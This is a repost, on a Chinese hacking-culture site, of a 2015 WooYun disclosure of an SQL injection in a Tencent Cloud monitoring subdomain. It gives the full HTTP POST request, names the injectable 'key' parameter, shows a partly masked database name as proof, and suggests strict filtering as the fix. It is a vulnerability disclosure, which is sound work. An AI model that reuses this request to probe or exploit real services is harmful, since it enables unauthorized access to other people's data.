记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

腾讯云某分站存在SQL注射之二

2015-03-08 00:46

http://cloud.qq.com

http://www.qcloud.com

腾讯云的管理控制台有两个版本,一个是新的console.qcloud.com,一个旧的manage.qcloud.com

存在漏洞的接口也是一个新的,一个旧的,接口不一样,参数不一样

旧的注入在这里: WooYun: 腾讯云某分站存在SQL注射

新的如下:

code 区域
POST /detail/request.ajax.php HTTP/1.1

Host: cm.qcloud.com

Proxy-Connection: keep-alive

Content-Length: 126

Accept: application/json, text/javascript, */*; q=0.01

Origin: http://cm.qcloud.com

X-Requested-With: XMLHttpRequest

User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36

Content-Type: application/x-www-form-urlencoded

Referer: http://cm.qcloud.com/detail/detail.php?type=cvm&appId=1251335462&MetricStatics=Device.eth1OutTraffic&val=10.251.81.21

Accept-Encoding: gzip, deflate

Accept-Language: zh-CN,zh;q=0.8,en;q=0.6

Cookie:

Connection: Keep-Alive

appId=1251335462&type=cvm&key=ipName&val=10.251.81.21&metricName=traffic__MetricStatics__Device.eth1OutTraffic&g_tk=1387739444





注入参数:key=ipName

漏洞证明:

database()

CdbDat*****

修复方案:

严格过滤

知识来源: www.wooyun.org/bugs/wooyun-2015-093181

阅读:124947 | 评论:0 | 标签:无

想收藏或者和大家分享这篇好文章→复制链接地址

“腾讯云某分站存在SQL注射之二”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

九层之台,起于垒土;黑客之术,始于阅读

推广

工具

标签云

本页关键词